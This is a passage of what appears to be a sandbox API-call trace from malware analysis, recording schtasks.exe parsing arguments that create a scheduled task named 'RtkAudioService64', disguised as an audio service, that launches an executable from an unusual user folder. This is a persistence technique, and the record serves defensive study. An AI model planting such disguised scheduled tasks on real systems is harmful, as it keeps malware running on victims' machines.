_memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.291] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0212.291] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.291] lstrlenW (lpString="|rp|") returned 4 [0212.291] lstrlenW (lpString="|tn|") returned 4 [0212.291] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0212.291] RtlRestoreLastWin32Error () returned 0x490 [0212.291] lstrlenW (lpString="sc") returned 2 [0212.292] lstrlenW (lpString="sc") returned 2 [0212.292] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.292] lstrlenW (lpString="tn") returned 2 [0212.292] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.292] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.292] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.292] lstrlenW (lpString="|sc|") returned 4 [0212.292] lstrlenW (lpString="|tn|") returned 4 [0212.292] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0212.292] RtlRestoreLastWin32Error () returned 0x490 [0212.292] lstrlenW (lpString="mo") returned 2 [0212.292] lstrlenW (lpString="mo") returned 2 [0212.292] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.292] lstrlenW (lpString="tn") returned 2 [0212.292] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.292] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.292] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.292] lstrlenW (lpString="|mo|") returned 4 [0212.292] lstrlenW (lpString="|tn|") returned 4 [0212.292] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0212.293] RtlRestoreLastWin32Error () returned 0x490 [0212.293] lstrlenW (lpString="d") returned 1 [0212.293] lstrlenW (lpString="d") returned 1 [0212.293] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.293] lstrlenW (lpString="tn") returned 2 [0212.293] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.293] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0212.293] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.293] lstrlenW (lpString="|d|") returned 3 [0212.293] lstrlenW (lpString="|tn|") returned 4 [0212.293] RtlRestoreLastWin32Error () returned 0x490 [0212.293] lstrlenW (lpString="m") returned 1 [0212.293] lstrlenW (lpString="m") returned 1 [0212.293] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.293] lstrlenW (lpString="tn") returned 2 [0212.293] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.293] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0212.293] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.293] lstrlenW (lpString="|m|") returned 3 [0212.293] lstrlenW (lpString="|tn|") returned 4 [0212.293] RtlRestoreLastWin32Error () returned 0x490 [0212.293] lstrlenW (lpString="i") returned 1 [0212.293] lstrlenW (lpString="i") returned 1 [0212.293] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.294] lstrlenW (lpString="tn") returned 2 [0212.294] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.294] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0212.294] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.294] lstrlenW (lpString="|i|") returned 3 [0212.294] lstrlenW (lpString="|tn|") returned 4 [0212.294] RtlRestoreLastWin32Error () returned 0x490 [0212.294] lstrlenW (lpString="tn") returned 2 [0212.294] lstrlenW (lpString="tn") returned 2 [0212.294] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.294] lstrlenW (lpString="tn") returned 2 [0212.294] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.294] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.294] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.294] lstrlenW (lpString="|tn|") returned 4 [0212.294] lstrlenW (lpString="|tn|") returned 4 [0212.294] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0212.294] RtlRestoreLastWin32Error () returned 0x0 [0212.294] RtlRestoreLastWin32Error () returned 0x0 [0212.294] lstrlenW (lpString="RtkAudioService64") returned 17 [0212.294] lstrlenW (lpString="-/") returned 2 [0212.294] StrChrIW (lpStart="-/", wMatch=0x4630052) returned 0x0 [0212.294] RtlRestoreLastWin32Error () returned 0x490 [0212.295] RtlRestoreLastWin32Error () returned 0x490 [0212.295] RtlRestoreLastWin32Error () returned 0x0 [0212.295] lstrlenW (lpString="RtkAudioService64") returned 17 [0212.295] StrChrIW (lpStart="RtkAudioService64", wMatch=0x3a) returned 0x0 [0212.295] RtlRestoreLastWin32Error () returned 0x490 [0212.295] RtlRestoreLastWin32Error () returned 0x0 [0212.295] lstrlenW (lpString="RtkAudioService64") returned 17 [0212.295] RtlRestoreLastWin32Error () returned 0x0 [0212.295] RtlRestoreLastWin32Error () returned 0x0 [0212.295] lstrlenW (lpString="/tr") returned 3 [0212.295] lstrlenW (lpString="-/") returned 2 [0212.295] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.295] lstrlenW (lpString="create") returned 6 [0212.295] lstrlenW (lpString="create") returned 6 [0212.295] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.296] lstrlenW (lpString="tr") returned 2 [0212.296] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.296] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.296] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.296] lstrlenW (lpString="|create|") returned 8 [0212.296] lstrlenW (lpString="|tr|") returned 4 [0212.296] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0212.296] RtlRestoreLastWin32Error () returned 0x490 [0212.296] lstrlenW (lpString="?") returned 1 [0212.296] lstrlenW (lpString="?") returned 1 [0212.296] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.296] lstrlenW (lpString="tr") returned 2 [0212.296] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.296] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0212.296] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.296] lstrlenW (lpString="|?|") returned 3 [0212.520] lstrlenW (lpString="|tr|") returned 4 [0212.521] RtlRestoreLastWin32Error () returned 0x490 [0212.521] lstrlenW (lpString="s") returned 1 [0212.521] lstrlenW (lpString="s") returned 1 [0212.521] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.521] lstrlenW (lpString="tr") returned 2 [0212.521] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.521] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0212.521] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.521] lstrlenW (lpString="|s|") returned 3 [0212.521] lstrlenW (lpString="|tr|") returned 4 [0212.521] RtlRestoreLastWin32Error () returned 0x490 [0212.521] lstrlenW (lpString="u") returned 1 [0212.521] lstrlenW (lpString="u") returned 1 [0212.521] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.521] lstrlenW (lpString="tr") returned 2 [0212.521] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.521] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0212.521] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.521] lstrlenW (lpString="|u|") returned 3 [0212.521] lstrlenW (lpString="|tr|") returned 4 [0212.521] RtlRestoreLastWin32Error () returned 0x490 [0212.521] lstrlenW (lpString="p") returned 1 [0212.521] lstrlenW (lpString="p") returned 1 [0212.521] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.522] lstrlenW (lpString="tr") returned 2 [0212.522] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.522] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0212.522] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.522] lstrlenW (lpString="|p|") returned 3 [0212.522] lstrlenW (lpString="|tr|") returned 4 [0212.522] RtlRestoreLastWin32Error () returned 0x490 [0212.522] lstrlenW (lpString="ru") returned 2 [0212.522] lstrlenW (lpString="ru") returned 2 [0212.522] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.522] lstrlenW (lpString="tr") returned 2 [0212.522] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.522] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0212.522] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.523] lstrlenW (lpString="|ru|") returned 4 [0212.523] lstrlenW (lpString="|tr|") returned 4 [0212.523] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0212.523] RtlRestoreLastWin32Error () returned 0x490 [0212.523] lstrlenW (lpString="rp") returned 2 [0212.523] lstrlenW (lpString="rp") returned 2 [0212.523] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.523] lstrlenW (lpString="tr") returned 2 [0212.523] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.523] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0212.523] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.523] lstrlenW (lpString="|rp|") returned 4 [0212.523] lstrlenW (lpString="|tr|") returned 4 [0212.523] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0212.523] RtlRestoreLastWin32Error () returned 0x490 [0212.523] lstrlenW (lpString="sc") returned 2 [0212.523] lstrlenW (lpString="sc") returned 2 [0212.523] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.523] lstrlenW (lpString="tr") returned 2 [0212.523] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.523] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.523] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.523] lstrlenW (lpString="|sc|") returned 4 [0212.524] lstrlenW (lpString="|tr|") returned 4 [0212.524] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0212.524] RtlRestoreLastWin32Error () returned 0x490 [0212.524] lstrlenW (lpString="mo") returned 2 [0212.524] lstrlenW (lpString="mo") returned 2 [0212.524] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.524] lstrlenW (lpString="tr") returned 2 [0212.524] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.524] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.524] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.527] lstrlenW (lpString="|mo|") returned 4 [0212.527] lstrlenW (lpString="|tr|") returned 4 [0212.527] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0212.527] RtlRestoreLastWin32Error () returned 0x490 [0212.527] lstrlenW (lpString="d") returned 1 [0212.527] lstrlenW (lpString="d") returned 1 [0212.527] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.527] lstrlenW (lpString="tr") returned 2 [0212.527] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.527] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0212.527] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.527] lstrlenW (lpString="|d|") returned 3 [0212.527] lstrlenW (lpString="|tr|") returned 4 [0212.528] RtlRestoreLastWin32Error () returned 0x490 [0212.528] lstrlenW (lpString="m") returned 1 [0212.528] lstrlenW (lpString="m") returned 1 [0212.528] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.528] lstrlenW (lpString="tr") returned 2 [0212.528] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.528] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0212.528] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.528] lstrlenW (lpString="|m|") returned 3 [0212.528] lstrlenW (lpString="|tr|") returned 4 [0212.528] RtlRestoreLastWin32Error () returned 0x490 [0212.528] lstrlenW (lpString="i") returned 1 [0212.528] lstrlenW (lpString="i") returned 1 [0212.528] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.528] lstrlenW (lpString="tr") returned 2 [0212.528] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.528] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0212.528] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.530] lstrlenW (lpString="|i|") returned 3 [0212.530] lstrlenW (lpString="|tr|") returned 4 [0212.530] RtlRestoreLastWin32Error () returned 0x490 [0212.530] lstrlenW (lpString="tn") returned 2 [0212.530] lstrlenW (lpString="tn") returned 2 [0212.530] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.530] lstrlenW (lpString="tr") returned 2 [0212.530] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.530] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.530] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.530] lstrlenW (lpString="|tn|") returned 4 [0212.531] lstrlenW (lpString="|tr|") returned 4 [0212.531] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0212.531] RtlRestoreLastWin32Error () returned 0x490 [0212.531] lstrlenW (lpString="tr") returned 2 [0212.531] lstrlenW (lpString="tr") returned 2 [0212.531] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.531] lstrlenW (lpString="tr") returned 2 [0212.531] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.531] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.531] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.531] lstrlenW (lpString="|tr|") returned 4 [0212.531] lstrlenW (lpString="|tr|") returned 4 [0212.531] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0212.531] RtlRestoreLastWin32Error () returned 0x0 [0212.531] RtlRestoreLastWin32Error () returned 0x0 [0212.531] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.531] lstrlenW (lpString="-/") returned 2 [0212.531] StrChrIW (lpStart="-/", wMatch=0x4630043) returned 0x0 [0212.531] RtlRestoreLastWin32Error () returned 0x490 [0212.531] RtlRestoreLastWin32Error () returned 0x490 [0212.531] RtlRestoreLastWin32Error () returned 0x0 [0212.532] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.532] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe" [0212.532] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.532] _memicmp (_Buf1=0x1b73f0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.532] _memicmp (_Buf1=0x1b7480, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.532] RtlRestoreLastWin32Error () returned 0x7a [0212.532] RtlRestoreLastWin32Error () returned 0x0 [0212.532] RtlRestoreLastWin32Error () returned 0x0 [0212.532] lstrlenW (lpString="C") returned 1 [0212.532] RtlRestoreLastWin32Error () returned 0x490 [0212.532] RtlRestoreLastWin32Error () returned 0x0 [0212.532] GetProcessHeap () returned 0x1b0000 [0212.532] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x10) returned 0x1baba0 [0212.532] _memicmp (_Buf1=0x1baba0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.532] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.532] GetProcessHeap () returned 0x1b0000 [0212.532] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x7c) returned 0x1baa70 [0212.532] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.532] lstrlenW (lpString=" \x09") returned 2 [0212.532] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0212.532] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0212.532] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x58) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0212.533] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0212.534] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0212.535] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.535] GetLastError () returned 0x0 [0212.535] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.535] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe") returned 61 [0212.535] RtlRestoreLastWin32Error () returned 0x0 [0212.535] RtlRestoreLastWin32Error () returned 0x0 [0212.535] lstrlenW (lpString="/sc") returned 3 [0212.535] lstrlenW (lpString="-/") returned 2 [0212.535] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.535] lstrlenW (lpString="create") returned 6 [0212.535] lstrlenW (lpString="create") returned 6 [0212.535] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.535] lstrlenW (lpString="sc") returned 2 [0212.535] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.536] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.536] lstrlenW (lpString="|create|") returned 8 [0212.536] lstrlenW (lpString="|sc|") returned 4 [0212.536] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0212.536] RtlRestoreLastWin32Error () returned 0x490 [0212.536] lstrlenW (lpString="?") returned 1 [0212.536] lstrlenW (lpString="?") returned 1 [0212.536] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] lstrlenW (lpString="sc") returned 2 [0212.536] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0212.536] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.536] lstrlenW (lpString="|?|") returned 3 [0212.536] lstrlenW (lpString="|sc|") returned 4 [0212.536] RtlRestoreLastWin32Error () returned 0x490 [0212.536] lstrlenW (lpString="s") returned 1 [0212.536] lstrlenW (lpString="s") returned 1 [0212.536] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] lstrlenW (lpString="sc") returned 2 [0212.536] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0212.536] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.536] lstrlenW (lpString="|s|") returned 3 [0212.536] lstrlenW (lpString="|sc|") returned 4 [0212.536] RtlRestoreLastWin32Error () returned 0x490 [0212.536] lstrlenW (lpString="u") returned 1 [0212.536] lstrlenW (lpString="u") returned 1 [0212.536] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.536] lstrlenW (lpString="sc") returned 2 [0212.536] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) 